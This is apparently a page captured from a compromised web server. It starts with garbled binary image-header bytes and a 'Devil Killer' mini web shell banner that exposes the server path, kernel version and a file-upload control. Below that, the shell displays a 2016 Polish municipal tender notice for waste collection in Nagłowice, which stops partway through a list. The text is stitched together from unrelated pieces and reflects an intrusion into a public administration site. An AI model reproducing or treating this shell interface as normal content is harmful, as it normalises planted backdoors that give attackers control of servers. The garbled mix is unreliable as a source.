JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161115/343098-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='www.bip.naglowice.pl' target='_blank'>www.bip.naglowice.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 343098 - 2016
              z dnia 2016-11-15 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Nagłowice: ODBIERANIE I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH 
OD WŁAŚCICIELI NIERUCHOMOŚCI ZAMIESZKAŁYCH 
I NIEZAMIESZKAŁYCH
 Z TERENU GMINY NAGŁOWICE W OKRESIE OD DNIA
 01 STYCZNIA 2017 ROKU DO DNIA 30 CZERWCA 2019 ROKU
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Nagłowice, krajowy numer identyfikacyjny
              29101039800000, ul.
              ul. Mikołaja Reja 
              9,
              28362  
              Nagłowice, woj.
              świętokrzyskie, państwo
              Polska, tel.
              041 3814567, 3814523, e-mail
              , faks
              413 814 567.
              <br />
              Adres strony internetowej (URL): www.bip.naglowice.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.naglowice.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Zgodnie z art. 10 c ust. 2 ustawy pzp w związku z art. 18 ustawy z dnia 22 czerwca 2016 r. o zmianie ustawy Prawo zamówień publicznych oraz niektórych innych ustaw (Dz.U.              z 2016 r. poz. 1020) składanie ofert odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r. Prawo pocztowe, osobiście lub za pośrednictwem posłańca.<br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>ODBIERANIE I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH 
OD WŁAŚCICIELI NIERUCHOMOŚCI ZAMIESZKAŁYCH 
I NIEZAMIESZKAŁYCH
 Z TERENU GMINY NAGŁOWICE W OKRESIE OD DNIA
 01 STYCZNIA 2017 ROKU DO DNIA 30 CZERWCA 2019 ROKU
<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest Odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych z terenu Gminy Nagłowice w okresie od dnia 01 stycznia 2017 roku do 30 czerwca 2019roku. 4. Wykonawca podczas realizacji zamówienia zobowiązany jest:
4.1 wykonywać usługę zgodnie z zapisami: 
1) Planu Gospodarki Odpadami dla Województwa Świętokrzyskiego na lata 2012 - 2018 wprowadzonego uchwałą nr XXI/360/12 Sejmiku Województwa Świętokrzyskiego z dnia 28 czerwca 2012 r. z późn. zm., 
2) Regulaminu utrzymania czystości i porządku na terenie Gminy Nagłowice wprowadzonym uchwałą Rady Gminy w Nagłowicach Nr XXV/140/2016z dnia 28 lipca 2016 roku oraz zmiana do regulaminu wprowadzona uchwałą Nr XXIX/155/2016 z dnia 10 listopada 2016r 
3) powszechnie obowiązujących przepisów ustawowych i wydanych na ich podstawie aktów wykonawczych, regulujących przedmiot niniejszego zamówienia, 

4.2 Posiadać umowy w zakresie przekazywania zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych, przeznaczonych do składowania do Regionalnej instalacji do przetwarzania odpadów komunalnych oraz instalacji przewidzianych do zastępczej obsługi tego regionu, wskazanych w uchwale w sprawie wykonania Planu gospodarki odpadami dla województwa świętokrzyskiego, jako instalacji regionalnej dla Gminy Nagłowice oraz innych kontrahentów w zakresie zagospodarowania surowców wtórnych, 
4.3. ponosić pełną odpowiedzialność wobec Zamawiającego i osób trzecich za szkody na mieniu, zdrowiu osób trzecich, powstałe podczas i w związku z realizacją przedmiotu umowy, w zakresie określonym w Kodeksie Cywilnym i innych ustawach. 

5. Zmiany w wymienionych w pkt 4.1 przepisach prawa skutkują obowiązkiem dostosowania realizacji zamówienia do wymogów prawa przez Wykonawcę i Zamawiającego.
Szczegółowy opis przedmiotu zamówienia:

1.	Przedmiotem zamówienia jest odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych z terenu gminy Nagłowice liczącej 17 sołectw: Brynica Mokra, Caców, Cierno - Żabieniec, Chycza - Brzóstki, Deszno, Jaronowice, Kuźnice, Nagłowice, Nowa Wieś, Rakoszyn, Rejowiec, Ślęcin, Trzciniec, Warzyn Pierwszy, Warzyn Drugi, Zagórze, Zdanowice gromadzonych w sposób selektywny jak i zmieszany.

2. Wykonawca zobowiązany jest do:
2.1 zapoznania się z regulaminem utrzymania czystości i porządku w gminie oraz ustalenia zgodnie z nim i z Zamawiającym szczegółowych harmonogramów wykonywania usługi według pkt. 7 niniejszego rozdziału - SIWZ, na cały czas trwania usługi, harmonogramy należy uzgodnić najpóźniej do dnia podpisania umowy, 
2.2 powiadamiania wszystkich właścicieli nieruchomości o w/w harmonogramach, na okresy roczne z 1 miesięcznym wyprzedzeniem, wykonawca sporządza harmonogramy odbioru w formie wydruków, które dostarcza właścicielom nieruchomości zamieszkałych i niezamieszkałych  ponadto wykonawca dostarcza Zamawiającemu w/w harmonogramy w formie elektronicznej, które Zamawiający publikuje na stronie internetowej www.naglowice.pl
2.3	terminowego i właściwego odbioru odpadów komunalnych z nieruchomości według ustalonych harmonogramów,
2.4	niezwłocznego informowania najpierw Zamawiającego, a następnie właścicieli nieruchomości o wszelkich zmianach dotyczących odbioru odpadów komunalnych, harmonogramów lub niemożności dostosowania się do ich wykonania. Wykonawca nie może wprowadzać żadnych zmian w realizowanej umowie bez zatwierdzenia przez Zamawiającego.

2.5	odbioru odpadów wystawionych w pojemnikach przed nieruchomości zamieszkałe i niezamieszkałe, wywozu i ich zagospodarowania zgodnie z obowiązującymi przepisami prawa,  które to czynności należy wykonywać w dni powszednie od poniedziałku do piątku w godzinach pracy Wykonawcy z zastrzeżeniami:
a)	nie wolno z nieruchomości do jednego samochodu zbierać jednocześnie odpadów zmieszanych lub pozostałych z segregacji i surowców wtórnych,
b)	jeżeli odbiór odpadów segregowanych i zmieszanych następuje w tym samym czasie Wykonawca wykonuje usługę dwoma samochodami odpowiednio oznakowanymi w tym napisy surowce wtórne i odpady komunalne,
c)	co miesięczne kontrolowanie rodzaju odpadów i zgodności ich przeznaczenia (selektywne, zmieszane) poprzez składanie miesięcznych sprawozdań zestawienie nr 5       ( ilości odpadów segregowanych i zmieszanych) w terminie 7 dni po zakończeniu miesiąca w formie papierowej i elektronicznej
2.6	po opróżnieniu pojemniki ustawić na właściwe miejsce i dokonać sprzątnięcia w przypadku rozsypania odpadów,
2.7	zawarcia umów i okazania ich Zamawiającemu w zakresie przekazywania wszystkich odebranych odpadów od właścicieli nieruchomości zamieszkałych i niezamieszkałych zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do Regionalnej instalacji do przetwarzania odpadów komunalnych wskazanej w uchwale w sprawie wykonania Planu gospodarki odpadami dla województwa Świętokrzyskiego, jako instalacji regionalnej dla Gminy Nagłowice oraz innych kontrahentów w zakresie zagospodarowania surowców wtórnych.
2.8	Wykonawca jest zobowiązany do osiągnięcia na obszarze objętym przedmiotem zamówienia poziomów recyklingu, przygotowania do ponownego użycia i odzysku frakcji odpadów obejmujących papier, metale, tworzywa sztuczne i szkło wyliczanych zgodnie z Rozporządzeniem Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz.U z 2012r. poz. 645),oraz rozporządzenia Ministra Środowiska z dnia 25 maja 2012r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazanych do składowania oraz sposobu obliczania poziomu ograniczenia masy tych odpadów (D.U. z 2012r. poz.676)

2.9	Kontrola osiągniętych przez wykonawcę poziomów recyklingu wykonywana będzie przez Zamawiającego na podstawie przekazywanych kopii kart przekazania odpadów zawierających informację o ilości odebranych odpadów zebranych w sposób selektywny (Mg) oraz ilości odebranych odpadów zebranych w sposób zmieszany (Mg)

2.10	 Obliczanie poziomów recyklingu, przygotowania do ponownego użycia i odzysku oraz weryfikacja osiągniętych przez wykonawcę poziomów recyklingu wykonywana będzie na podstawie półrocznych sprawozdań przekazywanych przez wykonawcę spełniających wymogi Rozporządzenia Ministra Środowiska z dnia 17 czerwca 2016 r. w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi( D. U. z 2016r. poz. 934), które należy przekazać na obowiązującym druku w formie elektronicznej na adresy: gmina@naglowice.pl; marta.mularczyk-wojcik@naglowice.pl i papierowej na adres Urząd Gminy w Nagłowicach ul. Mikołaja Reja 9,28-362 Nagłowice w ustawowym terminie.
2.11	 w przypadku nie osiągnięcia przez wykonawcę poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami zgodnie z Rozporządzeniem Ministra Środowiska z dnia 29 maja 2012 r. (Dz.U. z 2012 r. poz. 645) Zamawiający obciąży Wykonawcę karą umowną, a Wykonawca zobowiązuje się naliczoną karę bezspornie zapłacić Zamawiającemu w terminie 7 dni od wezwania.
2.12	 terminowego i właściwego przygotowywania sprawozdań wymaganych przepisami prawa i przekazywania ich Zamawiającemu, 
2.13	 naprawienia lub ponoszenia wg wyboru Zamawiającego kosztów naprawy szkód wyrządzonych podczas wykonywania usługi wywozu odpadów komunalnych na terenie Gminy Nagłowice (uszkodzenia chodników, ulic, obiektów małej architektury, pojemników itp.), 
2.14	 Ponoszenia odpowiedzialności za zawinione szkody w majątku Zamawiającego lub osób trzecich w trakcie odbioru odpadów.
2.15	 Wykonawcę obowiązuje zakaz mieszania odpadów zebranych na terenie gminy Nagłowice z odpadami zebranymi z terenu innych gmin.
2.14 Przekazania odebranych od właścicieli nieruchomości zmieszanych odpadów komunalnych oraz odpadów zielonych do Regionalnej instalacji do przetwarzania odpadów komunalnych (RIPOK) właściwej dla Regionu III lub instalacji przewidzianych do zastępczej obsługi tego regiony w przypadku, gdy instalacja uległa awarii lub nie może przyjmować odpadów z innych przyczyn
2.15 Przekazywania odebranych od właścicieli nieruchomości selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów, zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 17 ustawy z dnia 14 grudnia 2012r. o odpadach ( t.j. Dz.U. z 2013 r. poz. 21 z późn.zm) lub samodzielnego zagospodarowania zgodnie z obowiązującymi przepisami.
2.16 Prowadzenie kart ewidencji odpadów zgodnie z obowiązującymi przepisami
2.17 Wyposażenie nieruchomości w odpowiednią i właściwą ilość pojemników oraz ich dezynfekcja należy do właściciela nieruchomości, ale Zamawiający wymaga od Wykonawcy usługi w przypadku, gdy właściciel nieruchomości będzie zainteresowany i zgłosi taką potrzebę, zaopatrzenia nieruchomości w odpowiednie pojemniki do zbierania odpadów komunalnych, na zasadzie odrębnie i wzajemnie ustalonych warunków między właścicielem nieruchomości, a Wykonawcą (umowa sprzedaży, dzierżawy, najmu, użyczenia). Zamawiający nie będzie ponosił z tego tytułu żadnych należności.
3.1 Właściciele nieruchomości gromadzić będą odpady w następujących rodzajach pojemników:
a)	worki o pojemności od 60l do 120l,
b)	pojemniki o pojemności 120l, 240l i 1100l,
c)	kontenery KP-7 o poj. 6500l-7000l,
d)	kosze uliczne 10l  30l.
e)	pojemniki o pojemności 80 l- dla nieruchomości mieszanych (w części zamieszkałe i niezamieszkałe)
3.2  Kolorystyka pojemników do selektywnej zbiórki (worków i pojemników) będzie następująca:
	kolor niebieski - papier i tektura lub tekstylia, odzież
	kolor zielony - szkło bezbarwne i kolorowe
	kolor żółty  metal, tworzywa sztuczne i opakowania wielomateriałowe,
	kolor brązowy - ulegające biodegradacji i zielone
	kolor czarny - pozostałe w tym niesegregowane. 

3.3 Podstawowe dane o uwarunkowaniach zamówienia:
a) orientacyjna liczba nieruchomości, z których będą odbierane odpady komunalne stanowi zestawienie Nr 1 do SIWZ,
b) orientacyjna liczba pojemników, do wywozu w ciągu miesiąca kalendarzowego z nieruchomości niezamieszkałych z terenu Gminy Nagłowice zestawienie nr 2 do SIWZ
c) ilość odpadów odebranych z terenu gminy Nagłowice, na podstawie sprawozdań kwartalnych składanych przez przedsiębiorców posiadających zezwolenie na odbieranie odpadów komunalnych w latach 2014-2016 w zestawieniu Nr 3 do SIWZ
d) inne dane charakteryzujące uwarunkowania zamówienia podaje zestawienie Nr 4 do SIWZ.
e) Sprawozdanie miesięczne dotyczące ilości odebranych odpadów komunalnych od mieszkańców zestawienie Nr 5 do SIWZ będącą podstawą do wystawienia faktury za wykonaną usługę.

4.	Wykonawcy wraz z zawarciem umowy zostanie przekazana szczegółowa dokumentacja według zestawień roz. V pkt. 3.3 SIWZ, którą należy uznać za dokumentację wyjściową do stworzenia bazy właścicieli nieruchomości. W trakcie realizacji zadania baza ta będzie podlegała modyfikacjom ze względu na zmianę właścicieli nieruchomości, wielkości wytwarzanych odpadów czy też powstawania nowych obiektów na nieruchomościach, gdzie będą wytwarzane odpady komunalne lub ich likwidacji.

5.Ilość wytworzonych odpadów jak i inne dane wymienione w zestawieniach z pkt. 3.3 nie są zależne od Zamawiającego. Ustalone ilości orientacyjne będą ulegały zmianom stosownie do rzeczywistej ilości nieruchomości, ilości mieszkańców, ilości i rodzaju odpadów wytworzonych przez właścicieli nieruchomości. 

6.Wykonawca zobowiązany jest do odbioru i zagospodarowania całej masy odpadów komunalnych przekazanych przez właścicieli nieruchomości i PSZOK gromadzonych w sposób selektywny oraz odpadów zmieszanych.

7. Wykonawca jest zobowiązany realizować usługę odbioru i zagospodarowania odpadów komunalnych według niżej określonych warunków:

7.1 Częstotliwość i sposób odbioru odpadów komunalnych z nieruchomości odbywać się będzie, zależnie od rodzaju zabudowy i rodzaju odpadu oraz zgodnie z regulaminem utrzymania czystości i porządku w gminie.
a. zabudowa jednorodzinna
na terenie zabudowy jednorodzinnej obowiązywać będzie gromadzenie odpadów w systemie pojemnikowo  workowym:

- niesegregowane (zmieszane) odpady komunalne gromadzone będą 
w pojemnikach o poj.120l lub 240 l lub w workach o poj. 60l, 120l,
Częstotliwość odbioru z nieruchomości  1 raz w miesiącu.
	- segregowane  tworzywa sztuczne, metal, opakowania wielomateriałowe, odpady biodegradowalne zielone oraz pozostałości sortowania, przeznaczone do składowania gromadzone będą w pojemnikach o poj.120 l lub 240 l lub workach o poj. 60 l, 120 l,
Częstotliwość odbioru z nieruchomości  1 raz w miesiącu.
- segregowane  papier, tektura, tekstylia, odzież
Częstotliwość odbioru z nieruchomości  2 razy w roku.
- szkło
		Częstotliwość odbioru z nieruchomości  raz na kwartał

b. zabudowa wielorodzinna
na terenie zabudowy wielorodzinnej obowiązywać będzie gromadzenie odpadów 
w systemie mieszanym workowo  pojemnikowym oraz pojemnikowo  kontenerowym:

- niesegregowane odpady komunalne gromadzone będą w pojemnikach o poj.120l, 240l, 1100 l, 
Częstotliwość odbioru z nieruchomości,  2 raz w miesiącu
- segregowane  tworzywa sztuczne, metal, opakowania wielomateriałowe, odpady biodegradowalne zielone oraz pozostałości sortowania, przeznaczone do składowania gromadzone będą w pojemnikach o poj.120 l lub 240 l lub workach o poj. 60 l, 120 l,
Częstotliwość odbioru z nieruchomości  2 razy w miesiącu.
- segregowane  papier, tektura, tekstylia, odzież
Częstotliwość odbioru z nieruchomości  2 razy w miesiącu.
- szkło
		Częstotliwość odbioru z nieruchomości  2 razy w miesiącu.

c. nieruchomości niezamieszkałe: 

na terenie nieruchomości niezamieszkałych (działalność produkcyjna, usługowa, handlowa i obiekty użyteczności publicznej, cmentarze) obowiązywać będzie system mieszany: pojemniki, worki, kontenery.
Wykonawca jest zobowiązany do comiesięcznego przedkładania Zamawiającemu wraz z fakturą potwierdzenia odbioru ilości i rodzaju (zmieszane, segregowane) odebranych odpadów z nieruchomości niezamieszkałych  
- niesegregowane odpady komunalne gromadzone będą w pojemnikach o poj. 80 l,120 l, 240 l, 1100 l, KP-7 lub workach o poj. 60 l, 120 l
Częstotliwość odbioru z nieruchomości niezamieszkałych 1 raz w miesiącu
(dodatkowy wywóz w miesiącu maj-wrzesień w razie potrzeby na zgłoszenie)

- segregowane  tworzywo sztuczne, metal, opakowania wielomateriałowe, ulegające biodegradacji i zielone oraz pozostałości sortowania, przeznaczone do składowania gromadzone będą w pojemnikach o poj.80l, 120 l, 240 l, 1100l, KP-7 lub workach o poj. 60 l, 120 l
Częstotliwość odbioru z nieruchomości niezamieszkałych 1 raz w miesiącu
- segregowane  papier, tektura, tekstylia, odzież, szkło, gromadzone będą w pojemnikach o poj. 80 l, 120 l, 240 l, 1100 l, KP-7 lub w workach o poj. 60 l, 120 l
Częstotliwość odbioru z nieruchomości niezamieszkałych 1 raz w miesiącu
- Cmentarze - (dodatkowy wywóz w październiku, listopadzie 2017, 2018 r. w razie potrzeby na zgłoszenie)Wykonawca zobowiązany jest do odbioru w/w odpadów na zgłoszenie zamawiającego w ciągu 24 godzin od zgłoszenia. W przypadku, kiedy odbiór odpadów nie nastąpi w dowolnym miesiącu z danego cmentarza odbiór odpadów przechodzi na późniejszy termin na inne cmentarze w zależności od zgłoszenia przez Zamawiającego.  
Częstotliwość odbioru- 1 razy w miesiącu po uprzednim zgłoszeniu przez Zamawiającego




  d. warunki wspólne:

1)	odpady budowlane i rozbiórkowe powstałe w wyniku prac niewymagających zgłoszenia lub pozwolenia na budowę przekazywane będą przez właścicieli nieruchomości do punktu selektywnej zbiórki odpadów na terenie oczyszczalni ścieków ul. Mikołaja Reja 62 w Nagłowicach, skąd będą odbierane na zgłoszenie zarządcy, a ponadto
- bezpośrednio od właścicieli nieruchomości z nieruchomości, zgromadzonych w workach 120l x 6 szt. lub pojemnikach 3x 240l. dostarczonych przez Wykonawcę na żądanie lub do odbioru z Urzędu Gminy w Nagłowicach ul. Mikołaja Reja 9. W przypadku większych ilości należy dostarczyć do PSZOK własnym transportem.
2)	detergenty i akumulatory gromadzone w workach o poj. 60l lub 120l oraz przekazywane będą przez właścicieli nieruchomości do punktu selektywnej zbiórki odpadów na terenie oczyszczalni ścieków ul. Mikołaja Reja 62 w Nagłowicach, skąd będą odbierane na zgłoszenie Zamawiającego, a ponadto poprzez odbieranie wystawionych w/w odpadów przez właścicieli przed swoimi nieruchomościami (po uprzednim zgłoszeniu do Urzędu Gminy w Nagłowicach)
              Częstotliwość odbioru z nieruchomości -2 razy w roku,

